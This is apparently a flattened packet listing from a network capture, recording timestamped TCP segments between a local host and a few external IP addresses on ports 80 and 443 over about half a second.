                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.483429909 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.498121977 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.499119997 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.499134064 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.499144077 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.499281883 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.499281883 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.500052929 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.500065088 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.500127077 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.500148058 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.501086950 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.501101017 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.501111984 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.501183033 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.501183033 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.502140045 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.502154112 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.502274990 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.503057003 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.503070116 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.503079891 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.503114939 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.503151894 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.504111052 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.504122972 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.504172087 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.506201982 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.506720066 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.519970894 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.525428057 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.531048059 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.531147003 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.536344051 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.536432981 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.537172079 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.537295103 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.537910938 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.538439035 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.538476944 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.538516045 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.541016102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.541455030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.541496038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.541515112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.541692972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.542468071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.543380976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.548834085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.548846006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.548943043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.564567089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.564580917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.564696074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.573903084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.574587107 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.574688911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.593822002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.593959093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.594266891 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.596690893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.596770048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.597122908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.597240925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.609472036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.609484911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.609590054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.627721071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.633372068 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685053110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685339928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685693979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685705900 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685718060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685790062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.685790062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.687093973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.687127113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.687153101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.687182903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.688169003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.688180923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.688211918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.688273907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.696845055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.696949005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.696985006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.697417021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.706126928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.706206083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.706312895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.706633091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.721093893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.721115112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.721169949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.721259117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.722876072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.722953081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.723053932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.723105907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.732459068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.732546091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.732629061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.732692957 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.742078066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.742192030 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.742202044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.742273092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.753361940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.753433943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.753556967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.753607988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.806392908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.806406021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.806473017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.806473017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.811868906 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.811975956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.812721014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.812778950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.820943117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.820964098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.820988894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.821044922 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.837539911 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.837557077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.837627888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.837627888 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.843885899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.843899965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.843960047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.849208117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.849297047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.849519968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.849617004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.857558012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.857625008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.857795954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.857867002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.866444111 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.866502047 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.867202997 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.867419004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.867468119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.867512941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.867557049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.874609947 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.874663115 CET49745443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.874718904 CET44349745104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.876281023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.876382113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.876405954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.876449108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.885953903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.886020899 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.886173010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.886543036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.895469904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.895576954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.897739887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.897825956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.897866011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.897866011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.904771090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.904784918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.904843092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.904843092 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.911320925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.911385059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912103891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912209034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912220001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912288904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912492037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.912555933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.916738033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.916800976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.916985989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.917059898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.921602964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.921617985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.921657085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.921725988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.926145077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.926201105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.926253080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.926296949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.930891991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.931160927 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.931180954 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.931332111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.935096025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.935193062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.935203075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.935343981 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.939583063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.939742088 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.939944029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.940063000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.944050074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.944097996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.944120884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.944181919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.948115110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.948184967 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.948254108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.948311090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.957123995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.957185984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.957365036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.957482100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.959331036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.959391117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.959438086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.959491014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.963840008 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.963896036 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.964061022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.964131117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.968451977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.968509912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.968511105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.968610048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.972326994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.972409010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.972469091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.972595930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.976636887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.976696014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.976799965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.976896048 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.980997086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.981055021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.981096029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.981197119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.985325098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.985421896 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.985462904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.985543966 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.990794897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.990897894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.990997076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.991075993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.996258974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.996362925 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.996969938 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:32.997031927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.001663923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.001677036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.001725912 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.001743078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.005611897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.005625963 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.005670071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.005702019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.008378983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.008393049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.008435965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.008456945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.011840105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.011853933 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.011897087 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.011936903 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.022274971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.022336006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.023040056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.023082018 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.025921106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.025950909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.025983095 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.026000977 CET4974380192.168.2.431.41.244.11
